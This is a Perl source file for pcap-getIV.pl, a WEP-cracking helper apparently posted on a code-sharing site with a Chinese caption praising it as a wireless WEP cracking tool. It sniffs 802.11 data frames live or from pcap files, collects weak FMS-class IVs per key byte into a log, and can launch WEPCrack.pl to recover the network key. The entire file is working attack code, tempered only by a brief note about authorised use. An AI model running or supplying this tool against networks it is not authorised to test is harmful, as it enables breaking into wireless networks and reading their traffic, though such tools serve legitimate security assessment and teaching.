📄 pcap-getiv.pl

📁 破解WIRELESS WEP的工具,很好的东西,
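#!/usr/bin/perl
#
# pcap-getIV.pl
# Anton T. Rager 10/05/2004
#
# Opens a pcap file or a monitor-mode interface and watches 802.11 data
# frames for "weak" WEP IVs (FMS-class IVs).  Every weak IV seen is appended
# to IVFile.log as "iv0 iv1 iv2 firstcipherbyte" (decimal), after a header
# line holding the WEP key size in bytes.  This replaces the 3+ yr old
# prism-getIV.pl script that relied on prismdump and a braindamaged way of
# processing the prismdump captures.
#
# Use WEPCrack.pl to crack the key after collecting 60+ weak IVs for each
# keybyte of the secret.
#
# Features:
#  - auto detects the prism2 DLT (119) and skips the 144-byte prism2 header
#  - status message every $statdump WEP frames (timestamp + keybyte counters)
#  - works live (interface in monitor_mode + libpcap) and on saved pcap or
#    prismdump files
#
# Limitations:
#  - assumes all traffic is for the same BSSID/WEP network (use -F otherwise)
#  - does not discard repeated IVs from multiple/same nodes (-F on the
#    source MAC helps)
#  - only plain data frames (frame control 0x08) are inspected; QoS data
#    frames and radiotap captures (DLT 127) are not supported
#
# Security notes (reviewer):
#  - only run this against networks you are authorised to assess
#  - IVFile.log is written to, and ./WEPCrack.pl is executed from, the
#    current working directory; run from a directory only you can write to,
#    or a local user could plant a WEPCrack.pl / tamper with the IV log

use strict;
use warnings;
use Net::Pcap;
use Term::ReadKey;

# Non buffered output so progress lines appear immediately.
$| = 1;

# -------------------------- Begin Options ----------------------------------
my $bytesize        = 5;       # WEP key size in bytes: 5 = 40bit, 13 = 104bit (-b)
my $debug           = 0;       # 1 = print every IV seen, not just weak ones ('d' key)
my $append_log      = 1;       # append to an existing IVFile.log (-n creates a new one)
my $statdump        = 10000;   # emit a status line every this many WEP frames
my $crack_threshold = 60;      # weak IVs per keybyte wanted before 'c' launches WEPCrack
# Weak IV classes (from the FMS paper):
#  "Magic" IVs follow the (x, 255, y) form - most reliable for cracking,
#  but need lots of WEP frames.
#  "Resolved" IVs match the basic resolved equations - less reliable, but
#  occur often.
#  (h1kari's dwepcrack 2nd-output-byte weak IVs are a future option.)
my $magic_iv    = 1;
my $resolved_iv = 0;
# Optional single MAC (BSSID or source address) to limit IV collection to one
# network or host; empty means every frame is evaluated (-F).
my $filter  = '';
my $LOGFILE = 'IVFile.log';
# -------------------------- Options End Here -------------------------------

my $file;                        # -f pcap file
my $dev;                         # -i live interface
my $object;                      # Net::Pcap handle
my $offset = 0;                  # capture-header bytes before the 802.11 frame
my $iv_fh;                       # IVFile.log filehandle
my @keycounter;                  # weak IVs collected per keybyte
my $wep_progress_counter = 0;    # WEP frames since the last status dump
my $total_frames = 0;            # WEP frames accounted for at status dumps
my $start_time;                  # time() when the capture loop started
my $save_time;                   # time() of the last status dump
my $help;

# -------------------------- Argument parsing -------------------------------
# -f file, -i int, -b bytesize, -w weak IV types (magic/resolved), -F filter,
# -n new logfile, -h usage.
if (!@ARGV || substr($ARGV[0], 0, 1) ne '-') {
    print("Error: must supply options\n");
    usage();
}
while (@ARGV && substr($ARGV[0], 0, 1) eq '-') {
    my $opt = shift @ARGV;
    if ($opt eq '-f') {
        $file = shift @ARGV;
    } elsif ($opt eq '-i') {
        $dev = shift @ARGV;
    } elsif ($opt eq '-F') {
        $filter = shift @ARGV;
    } elsif ($opt eq '-b') {
        # Only a positive decimal integer is accepted; anything else keeps
        # the current default.
        my $val = shift @ARGV;
        if (defined $val && $val =~ /\A\d+\z/ && $val > 0) {
            $bytesize = $val;
        } else {
            print("bytesize is not an integer, reverting to bytesize of $bytesize\n");
        }
    } elsif ($opt eq '-w') {
        # Comma separated list of weak IV classes; an empty or invalid list
        # falls back to "magic".
        $magic_iv    = 0;
        $resolved_iv = 0;
        my $list = shift @ARGV;
        for my $IV_list (split /,/, (defined $list ? $list : '')) {
            if ($IV_list eq 'magic') {
                $magic_iv = 1;
            } elsif ($IV_list eq 'resolved') {
                $resolved_iv = 1;
            } else {
                print("Invalid IV type $IV_list\n");
            }
        }
        $magic_iv = 1 unless $magic_iv || $resolved_iv;
    } elsif ($opt eq '-n') {
        $append_log = 0;
    } elsif ($opt eq '-h') {
        usage();
    } else {
        # An unknown "-x" option used to spin the parser forever; reject it.
        print("Error: unknown option $opt\n");
        usage();
    }
}
if (!defined $file && !defined $dev) {
    print("Error: must supply -i interface or -f pcapfile\n");
    usage();
}

# unpack('H*') yields lowercase hex without separators, so normalise the
# user supplied MAC to the same form or an upper-case / colon-separated
# filter would silently never match.
$filter = '' unless defined $filter;
$filter = lc $filter;
$filter =~ s/[:-]//g;

# Graceful exit with flush on <ctrl>C.
$SIG{INT} = \&sigint_handler;

my $err;
if (defined $file) {
    $object = Net::Pcap::open_offline($file, \$err);
    print("Opening pcap file $file.....\n");
    die("Pcap Open Failed for file $file" . ($err ? ": $err" : '') . "\n") unless $object;
} else {
    # snaplen 1510, non-promiscuous, no read timeout
    $object = Net::Pcap::open_live($dev, 1510, 0, -1, \$err);
    print("Opening device $dev.....\n");
    die("Pcap Open Failed for device $dev" . ($err ? ": $err" : '') . "\n") unless $object;
}

# Only two link types are understood: raw 802.11 and prism2-wrapped 802.11.
my $dlt = Net::Pcap::datalink($object);
print("DLT = $dlt: ");
if ($dlt == 105) {
    print("DLT_IEEE802_11 (0byte Offset)\n");
    $offset = 0;
} elsif ($dlt == 119) {
    print("Prism2 Header (144byte Offset)\n");
    $offset = 144;
} else {
    die("unsupported DLT type $dlt\n");
}

print("Assuming WEP key is $bytesize bytes (", $bytesize * 8, "bits) long \n");
print("\tthis determines how may keybytes deep to collect weak IVs\n");
print("\tchange bytesize var or IVFile.log header if otherwise\n");
print("\n");
print("Status update at $statdump packets\n");

open_iv_log($append_log);
@keycounter = (0) x $bytesize;

if ($filter) {
    print("Filtering on source MAC or BSSID of $filter\n");
} else {
    print("No filters - evaluating all detected frames for weak IVs\n\t(mult APs will prob confuse cracker)\n");
}
print("IV Flags: Magic=$magic_iv, Resolved=$resolved_iv\n");

$help = <<"EOF";
Interactive Commands:
\th: Flash help
\tf: Flush data to file
\tn: Create new IVFile.log file
\ts: Flash status summary
\td: Toggle debug packet printing (1=All IVs/0=Only Weak IVs)
\tc: Launch WEPCrack process on collected data
\t^c: Exit
EOF
print("Press 'h' for interactive command help\n");

$start_time = time();
Net::Pcap::loop($object, -1, \&process_packet, undef);
print("Exiting and flushing files\n");
Net::Pcap::close($object);
close($iv_fh) or die("close $LOGFILE: $!\n");

# ---------------------------------------------------------------------------

# Flush and close everything, then exit (snipped from jwright).  Always exits,
# even if the capture handle was never opened.
sub sigint_handler {
    Net::Pcap::close($object) if $object;
    close($iv_fh) if $iv_fh;
    print("Flushed open files\n");
    exit(0);
}

# Net::Pcap::loop callback: classify the frame, then service the keyboard.
sub process_packet {
    my ($user_data, $header, $pkt) = @_;
    handle_frame($pkt);
    poll_keyboard();
    return;
}

# Inspect one captured frame.  Only plain data frames (frame control 0x08)
# are looked at; the IV sits right after the 24-byte 802.11 header.
# Truncated captures are skipped instead of being parsed as garbage.
sub handle_frame {
    my ($pkt) = @_;
    my $len = length($pkt);

    return if $len <= $offset;          # no frame control byte captured
    my $frame_type = ord(substr($pkt, $offset, 1));
    return if $frame_type != 0x08;      # beacons, management, QoS data, ...
    # 24 byte header + 3 byte IV + key id byte + first cipher byte.
    return if $len < $offset + 29;

    my $flags    = ord(substr($pkt, $offset + 1, 1));
    my $addr_1   = unpack('H*', substr($pkt, $offset + 4,  6));
    my $addr_2   = unpack('H*', substr($pkt, $offset + 10, 6));
    my $addr_3   = unpack('H*', substr($pkt, $offset + 16, 6));
    my $llc_head = unpack('H*', substr($pkt, $offset + 24, 5));    # WEP IV+keyid+1 byte, or LLC

    # Which address is the BSSID / source depends on the To-DS / From-DS bits.
    my ($bssid, $source_mac);
    if ($flags & 0x01) {            # To-DS (WDS frames land here too)
        ($bssid, $source_mac) = ($addr_1, $addr_2);
    } elsif ($flags & 0x02) {       # From-DS
        ($bssid, $source_mac) = ($addr_2, $addr_3);
    } else {                        # IBSS / ad-hoc: addr3 is the BSSID
        ($bssid, $source_mac) = ($addr_3, $addr_2);
    }
    return if $filter && $bssid ne $filter && $source_mac ne $filter;

    if ($flags & 0x40) {            # Protected (WEP) bit
        record_wep_iv($bssid, $source_mac, $llc_head);
    } elsif ($llc_head eq 'aaaa030000' || $llc_head eq 'aaaa190087' || $llc_head eq 'aaaa31009c') {
        # A SNAP LLC header is present, so this really is cleartext.
        print("Cleartext\n");
    } else {
        # No WEP flag but no recognised LLC either - some prism firmware
        # strips the flag.  Just note it for now.
        # 0xAA - IP LLC, 0xf0 - NetBios, 0xE0 - IPX
        print("No WEP flag, but fuzzycheck thinks WEP - you may weant to upgrade your prism firmware ($llc_head)\n");
    }
    return;
}

# Account for one WEP frame: periodic status output, optional debug line,
# and - when the IV is weak - one line in IVFile.log plus a keybyte counter.
# $iv_field is 10 hex chars: IV0 IV1 IV2 keyid firstcipherbyte.
sub record_wep_iv {
    my ($bssid, $source_mac, $iv_field) = @_;

    my @IVList  = map { substr($iv_field, $_ * 2, 2) } 0 .. 3;
    my $onebyte = substr($iv_field, 8, 2);
    my ($iv0, $iv1, $iv2) = map { hex($_) } @IVList[0 .. 2];

    $wep_progress_counter++;
    my $timestamp = time();
    if ($wep_progress_counter == $statdump) {
        $total_frames += $wep_progress_counter;
        my $pkt_ave = rate($total_frames, $timestamp - $start_time);
        my $int_ave = (defined $save_time && $timestamp - $save_time > 0)
            ? rate($statdump, $timestamp - $save_time)
            : $pkt_ave;
        print("Timestamp=$timestamp : $total_frames WEP frames seen (tot=$pkt_ave fps, last=$int_ave fps)\n\tWeak IV Keybyte Counters:\n\t");
        print_keycounters();
        $wep_progress_counter = 0;
        $save_time            = $timestamp;
    }

    if ($debug) {
        print("WEP: bssid=$bssid, src=$source_mac IV $IVList[0]:$IVList[1]:$IVList[2] $IVList[3] - $onebyte\n");
    }

    # Weak IV classes and the keybyte each one leaks (FMS):
    #  Magic:  [0] > 2, [0]-3 < keysize, [1] == 255        -> keybyte [0]-3
    #  Low:    ([0]+[1]) % 256 == 1, [2]+2 < keysize       -> keybyte [2]+2
    #  High:   ([0]+[1]) % 256 == 254-[2], 254-[2] < keysize -> keybyte 254-[2]
    my ($label, $keybyte);
    if ($magic_iv && $iv0 > 2 && $iv0 - 3 < $bytesize && $iv1 == 255) {
        ($label, $keybyte) = ('write: Magic IV', $iv0 - 3);
    } elsif ($resolved_iv && ($iv0 + $iv1) % 256 == 1 && $iv2 + 2 < $bytesize) {
        ($label, $keybyte) = ('Low IV', $iv2 + 2);
    } elsif ($resolved_iv && ($iv0 + $iv1) % 256 == 254 - $iv2
             && 254 - $iv2 >= 0 && 254 - $iv2 < $bytesize) {   # >= 0 is defensive: never index from the end
        ($label, $keybyte) = ('High IV', 254 - $iv2);
    }
    return unless defined $keybyte;

    print("$label bssid=$bssid source=$source_mac IV=$IVList[0]:$IVList[1]:$IVList[2]->$onebyte (keybyte:$keybyte) \n");
    print {$iv_fh} "$iv0 $iv1 $iv2 ", hex($onebyte), "\n";
    $keycounter[$keybyte]++;
    return;
}

# Non-blocking single-key poll for the interactive commands listed in $help.
sub poll_keyboard {
    ReadMode('cbreak');
    my $key = ReadKey(.000001);
    ReadMode('normal');
    return unless $key;

    if ($key eq 'h') {
        print("-$help");
    } elsif ($key eq 'd') {
        $debug ^= 1;
        print("-Debug = $debug\n");
    } elsif ($key eq 'f') {
        flush_log();
        print("-Flushed open files\n");
    } elsif ($key eq 'n') {
        close($iv_fh);
        open_iv_log(0);
    } elsif ($key eq 's') {
        # Frames since the last dump are shown but not folded into
        # $total_frames, so the next status dump does not count them twice.
        my $timestamp = time();
        my $seen      = $total_frames + $wep_progress_counter;
        my $pkt_ave   = rate($seen, $timestamp - $start_time);
        print("-Stats: Timestamp=$timestamp : $seen WEP frames seen ($pkt_ave fps)\n\tWeak IV Keybyte Counters:\n\t");
        print_keycounters();
    } elsif ($key eq 'c' || $key eq 'C') {
        # 'c' refuses to crack below the threshold; 'C' forces it.
        my $crack_warn = 0;
        if ($key eq 'c') {
            print("-Checking IV stats\n");
            for my $x (0 .. $bytesize - 1) {
                if ($keycounter[$x] < $crack_threshold) {
                    $crack_warn = 1;
                    print("\tWe only have $keycounter[$x] weak IVs for Keybyte $x and threshold is $crack_threshold\n");
                }
            }
        }
        if (!$crack_warn || $key eq 'C') {
            Net::Pcap::close($object);
            close($iv_fh) or die("close $LOGFILE: $!\n");    # flush before handing over
            print("-Flushed open files\n");
            print("--Calling ./WEPCrack.pl\n\n");
            # Resolved relative to the current directory - see security notes.
            exec('./WEPCrack.pl') or die("exec ./WEPCrack.pl failed: $!\n");
        } else {
            print("Try \"C\" if you really want to crack with too few weak IVs\n");
        }
    }
    return;
}

# Integer frames-per-second; a zero-length interval (first $statdump frames
# of a pcap file read within one second) no longer divides by zero.
sub rate {
    my ($count, $secs) = @_;
    return int($count / ($secs > 0 ? $secs : 1));
}

# Print " 0=n 1=n ..." for every keybyte, then a newline.
sub print_keycounters {
    print(" $_=$keycounter[$_]") for 0 .. $bytesize - 1;
    print("\n");
    return;
}

# Turn on autoflush for the IV log (flushes whatever is buffered now).
sub flush_log {
    select((select($iv_fh), $| = 1)[0]);
    return;
}

# Open IVFile.log: append to an existing one when $append is true, otherwise
# create it fresh with the key-size header line WEPCrack.pl expects.
sub open_iv_log {
    my ($append) = @_;
    if ($append && -f $LOGFILE) {
        # assume the existing header has the same bitsize
        print("Appending to existing logfile IVFile.log\n");
        open($iv_fh, '>>', $LOGFILE) or die("Cannot open $LOGFILE for append: $!\n");
        # TODO: read existing file and update WeakIV counters
    } else {
        print("Creating new logfile IVFile.log\n");
        open($iv_fh, '>', $LOGFILE) or die("Cannot create $LOGFILE: $!\n");
        # Temp static header for 40/104 WEP - need to change cracker to try both?
        print {$iv_fh} "$bytesize\n";
    }
    return;
}

sub usage {
    die("pcap-getIV.pl [-i interface/-f pcapfile] (options)\n"
      . "\t-f pcap filename\n"
      . "\t-i pcap interface\n"
      . "\t-w weak IV type list (\"magic\", \"resolved\" or \"magic,resolved\" for both)\n"
      . "\t-F include source/BSSID filter (hex MAC - ie \"010203ffffff\")\n"
      . "\t-b WEP Bytesize (defaults to 5 - 5=40bit, 13=104bit)\n"
      . "\t-n create new logfile (default is append to existing)\n");
}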
